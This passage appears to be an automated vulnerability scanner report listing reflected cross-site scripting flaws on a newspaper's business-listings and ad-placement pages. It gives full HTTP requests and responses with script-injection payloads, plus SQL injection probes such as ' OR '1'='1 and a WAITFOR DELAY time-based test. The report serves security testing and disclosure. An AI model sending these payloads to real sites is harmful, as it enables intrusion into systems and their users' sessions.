58962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=3&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2cca5d6<script>alert(1)</script>f1112cfe0af5c01fb&strStates=3&SubCatId=3&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=JDIPGLGAGKINHNJPBNGFIHLA
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 15:33:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7151
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSAATRSAT=ABHGOFIAGDLLLEFIDBOLAHHJ; path=/
Cache-control: private

<h1>Form</h1><h1>QueryString</h1>AdTagCountyId=1;WAITFOR%20DELAY%20%270:0:25%27--&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&La
...[SNIP]...
a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2cca5d6<script>alert(1)</script>f1112cfe0af5c01fb&strStates=3&SubCatId=3&ThisPage=1

4.334. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strSQL3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the strSQL3 request parameter is copied into the HTML document as plain text between tags. The payload 9a7c8<script>alert(1)</script>adcb838ad8a was submitted in the strSQL3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c9a7c8<script>alert(1)</script>adcb838ad8a&strStates=3&SubCatId=3&ThisPage=1

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:49:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c9a7c8<script>alert(1)</script>adcb838ad8a&strStates=3&SubCatId=3&ThisPage=1<h1>
...[SNIP]...

4.335. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strStates parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the strStates request parameter is copied into the HTML document as plain text between tags. The payload 8f135<script>alert(1)</script>123da5d7d32 was submitted in the strStates parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 391

AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=38f135<script>alert(1)</script>123da5d7d32&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 465
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=38f135<script>alert(1)</script>123da5d7d32&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3<h1>
...[SNIP]...

4.336. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strStates parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the strStates request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eff82"><script>alert(1)</script>25ddab0529814cfa8 was submitted in the strStates parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=eff82"><script>alert(1)</script>25ddab0529814cfa8&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:23:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91570
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCBSSQAT=IFNKJLNDKJEMFPMFLHIEGDIH; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="strStates" value="eff82"><script>alert(1)</script>25ddab0529814cfa8">
...[SNIP]...

4.337. http://listings.nytimes.com/BusinessDirectory/View_Listing.asp [CategoryID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/View_Listing.asp

Issue detail

The value of the CategoryID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1e6c"><script>alert(1)</script>66a9b7225e9 was submitted in the CategoryID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /BusinessDirectory/View_Listing.asp?CategoryID=BIZDIRf1e6c"><script>alert(1)</script>66a9b7225e9&Lid=125-547942 HTTP/1.1
Host: listings.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; zFN=ABDCABC3AB810AB0G30A00G03; zFD=ABDCABC3AB810AB0G30A00G03; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; up=AB8GAb1e20SA09Nj; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Nov 2010 11:21:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 28013
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCAATSTDS=JNHBPFIAOMMKAOMOCBLNKOIE; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<a id="postAnAd" href="https://placead.nytimes.com/default.asp?CategoryID=BIZDIRf1e6c"><script>alert(1)</script>66a9b7225e9">
...[SNIP]...

4.338. http://listings.nytimes.com/BusinessDirectory/View_Listing.asp [Lid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/View_Listing.asp

Issue detail

The value of the Lid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b158"><script>alert(1)</script>176c790b12d was submitted in the Lid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /BusinessDirectory/View_Listing.asp?CategoryID=BIZDIR&Lid=125-5479425b158"><script>alert(1)</script>176c790b12d HTTP/1.1
Host: listings.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; zFN=ABDCABC3AB810AB0G30A00G03; zFD=ABDCABC3AB810AB0G30A00G03; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; up=AB8GAb1e20SA09Nj; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Nov 2010 11:21:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 40311
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACDTRTCS=DMDGLHIAOLHICGMALPGMEGCK; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="Lid" value="125-5479425b158"><script>alert(1)</script>176c790b12d">
...[SNIP]...

4.339. https://placead.nytimes.com/default.asp [CategoryID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://placead.nytimes.com
Path:   /default.asp

Issue detail

The value of the CategoryID request parameter is copied into a JavaScript rest-of-line comment. The payload 2e262%0aalert(1)//f836dc6f2af was submitted in the CategoryID parameter. This input was echoed as 2e262
alert(1)//f836dc6f2af
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /default.asp?CategoryID=BIZDIR2e262%0aalert(1)//f836dc6f2af HTTP/1.1
Host: placead.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Nov 2010 11:22:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 24581
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACDCSSCA=GFDFGBMDADFONCACAIOAHBDE; path=/
